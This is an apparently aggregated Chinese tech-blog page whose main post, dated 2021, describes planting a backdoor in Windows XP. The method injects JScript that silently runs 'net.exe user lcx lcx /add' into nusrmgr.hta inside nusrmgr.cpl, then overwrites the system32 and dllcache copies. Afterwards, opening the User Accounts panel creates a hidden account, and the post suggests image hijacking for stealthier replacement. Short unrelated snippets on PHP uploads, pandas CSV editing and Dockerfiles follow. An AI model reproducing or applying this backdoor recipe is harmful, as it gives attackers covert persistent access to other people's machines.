利用cpl檔案在xp中留乙個後門

2021-04-30 09:30:51 字數 620 閱讀 1138

先請看圖:

這是我用restorator 開啟nusrmgr.cpl時的情形。你看到了什麼?是不是很吃驚,原來xp中控制面板中的「使用者帳戶」選項竟然是html做的。其實不然,微軟的好多元件的面板都是html做的。這也是微軟為什麼一直無法清掉ie的原因,它牽涉太多了,就算是反壟斷法也不可能讓微軟刪掉ie的。

看到圖中的那個nusrmgr.hta檔案了嗎?我們可以用它來做下手腳(當然你選別的js檔案也是可以的)

我們在裡邊加幾行js語句:

var wshshell = createobject("wscript.shell")

wshshell.run("net.exe user lcx lcx /add", 0, true)

然後:echo y|copy nusrmgr.cpl c:/windows/system32/dllcache/nusrmgr.cpl

echo y|copy nusrmgr.cpl c:/windows/system32/nusrmgr.cpl

替換原來的檔案。這樣以後使用者再呼叫控制面板裡的「使用者帳戶」選項後,就會自動給你加乙個帳戶了。

這算是乙個思路了,應當很雞肋。如果要完美一點,可以檢視一下別的cpl檔案如何更改,如何無聲無息的替掉原來的檔案(如映象劫持)。

檔案上傳 在乙個檔案中實現

php能夠接受任何來自符合rfc 1867標準的瀏覽器上傳的檔案。php的這種特性使得我們既可以上傳文字檔案,也可以上傳二進位制檔案。檔案上傳後,php接受它,並作為臨時檔案儲存。處理 接受上傳檔案的php指令碼必須在檔案上傳後進行判斷,來決定接下來要對該檔案進行哪些操作。例如,您可以通過 file...

利用python在已有csv檔案後增加一列

工具包選擇pandas內涵的csv處理器 import pandas as pd from pandas import read csvdata read csv c users lenovo documents xinyong datatraining.csv woe data empwoe da...

如何利用Dockerfile檔案構建乙個新映象

dockerfile是由一系列引數和命令組成的指令碼,這些命令和引數應用於基礎映象並最終建立乙個新的映象。開發人員構建好乙個一致的開發環境,測試人員和運維人員就可以直接使用了。隨便找個目錄,新建個檔案,名稱必須為dockerfile 然後輸入 from centos cmd echo hello d...